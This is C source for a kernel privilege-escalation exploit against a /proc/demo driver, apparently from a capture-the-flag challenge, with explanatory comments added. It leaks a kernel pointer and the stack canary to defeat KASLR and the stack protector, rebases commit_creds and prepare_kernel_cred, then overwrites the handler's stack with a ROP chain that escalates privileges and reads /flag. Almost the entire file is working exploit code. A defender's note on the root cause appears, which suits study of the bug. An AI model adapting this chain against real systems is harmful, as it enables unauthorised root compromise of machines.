// Kernel symbol addresses, filled in by main() once the kernel slide has been
// derived from the leaked pointer; zero until then.
// Reference values from one build: 0xffff8000080a2258 0xffff8000080a24f8
size_t commit_creds = 0;
size_t prepare_kernel_cred = 0;

// Slid kernel text base and the slide itself (main() computes both).
// The unslid base this build was linked at: 0xffff800008000000
size_t kernel_base = 0;
size_t offset = 0;

// kernel_base + fixed offset, placed into the overwritten frame by main();
// presumably a gadget address, build-specific like the others.
size_t gadget2 = 0;
// Post-exploitation payload. main() stores this function's address in the
// slot it annotates as elr_el1, so this is presumably where execution lands
// once the kernel returns to user space; it only dumps /flag to stdout.
// Kept in the page's register-level detail only as far as the author wrote it.
void shell(void)
{
    // int uid = getuid();
    // printf("uid == %d\n",uid);
    // system("/bin/sh");
    char buf[0x40] = {0};
    // 0 == O_RDONLY on Linux; the descriptor is never checked, so a failed
    // open makes the read below fail silently and 0x40 zero bytes are printed.
    int fd = open("/flag", 0);
    // Short reads are not handled; buf is NUL-filled so nothing is left
    // uninitialized, but the write always emits the full 0x40 bytes.
    read(fd, buf, 0x40);
    write(1, buf, 0x40);
}
// Exploit driver for the /proc/demo kernel module used in this challenge.
// Two primitives are visible from this side: a 0x1f8-byte read that returns
// more than the driver's own data (a kernel text pointer at index 2 and the
// stack canary at index 12, which defeat KASLR and the stack protector), and a
// 0x200-byte write that overwrites the handler's stack frame with a ROP chain.
// Defender's view: the kernel-side root cause is presumably a read/write
// handler that copies a caller-chosen length to/from a fixed stack buffer;
// bounding both copies to the buffer size (and not exposing uninitialized
// stack) removes both primitives at once. Every constant below is specific to
// one kernel build (the comments give the values the author observed) and
// the chain depends on exact slot order, so no line is reordered here.
int main()
{
    // 2 == O_RDWR on Linux; the same descriptor is used for the leak and
    // the overwrite.
    int fd = open("/proc/demo", 2);
    if (fd < 0)
    {
        puts("open error");
        exit(-1);    // exit status 255; no errno is reported
    }
    // 0x200 * sizeof(size_t) bytes of user stack; the return value of read()
    // is not checked, so a short read leaves the unread slots zero.
    size_t leak[0x200] = {0};
    read(fd, leak, 0x1f8);
    // Dump the leaked words for inspection. Note %llx with size_t: the
    // matching specifier would be %zx (same width on this target, but UB
    // per the standard).
    for (int i = 0; i < 36; i++)
    {
        printf("id %d : 0x%llx\n", i, leak[i]);
    }
    // Slot 2 holds a kernel text pointer, slot 12 the stack canary, presumably
    // the handler's own saved state that the over-read exposed.
    size_t kernel_addr = leak[2];
    size_t canary = leak[12];
    printf("kerenl_addr== 0x%llx , canary == 0x%llx\n", kernel_addr, canary);
    // KASLR slide: distance between the leaked pointer and its unslid address
    // in this build, then rebase every other symbol by the same amount.
    offset = kernel_addr - 0xffff8000082376f8;
    kernel_base = 0xffff800008000000 + offset;
    // ffffd587d10a2258 0xffffd587d10a2258
    commit_creds = kernel_base + 0xa2258;
    prepare_kernel_cred = kernel_base + 0xa24f8;
    gadget2 = kernel_base + 0x16950;
    printf("kerenl_base== 0x%llx ,commit_creds == 0x%llx, prepare_kernel_cred == 0x%llx\n", kernel_base, commit_creds, prepare_kernel_cred);
    printf("%p\n", leak);
    // Build the overwrite in place on top of the leaked frame. Slots not
    // assigned below keep whatever the driver returned. Filler values
    // (0x41.., 0x11.., 0x22.. etc.) are markers the author used to identify
    // slots; the leaked canary is re-written at 16 and 38 so the stack
    // protector check passes on each frame the chain unwinds.
    leak[13] = 0x4141414141414141;
    leak[14] = 0x4141414141414141;
    leak[16] = canary;
    leak[18] = gadget2;
    leak[19] = 0;
    leak[20] = 0;
    leak[21] = 0x8888888888888888;
    leak[22] = prepare_kernel_cred + 4;   // +4 skips the first instruction of the target; build-specific
    leak[32] = commit_creds + 4;
    leak[33] = 0x1111111111111111;
    leak[36] = gadget2;
    leak[37] = 0x7777777777777777;
    leak[38] = canary;
    leak[39] = 0x2222222222222222;
    leak[40] = 0x3333333333333333;
    // Register image for the final gadget, as annotated by the author; the
    // three addresses noted were the values observed in one run.
    leak[41] = (size_t)leak;            // x29 far_el1 = 0x00ffffc150b790
    leak[42] = kernel_base + 0x11fe4;   // x30
    leak[43] = 0x6666666666666666;      // x19
    leak[44] = 0x7777777777777777;      // x20
    leak[45] = (size_t)shell;           // x21 elr_el1 = 0x41f518
    leak[46] = 0x80001000;              // x22 spsr_el1 = 0x80001000
    leak[47] = (size_t)leak;            // x23 sp_el0 = 0x00ffffc150b790
    leak[48] = 0x2222222222222222;      // x24
    leak[49] = 0x3333333333333333;      // x25
    leak[51] = 0x4444444444444444;
    // Trigger: 0x200 bytes back into the driver, larger than the 0x1f8 it
    // handed out. Return value unchecked; a driver that bounds this copy
    // would make the call return an error or a short count instead.
    write(fd, leak, 0x200);
    close(fd);
    return 0;
};   // stray ';' after the function body is an empty declaration (harmless, -pedantic warns)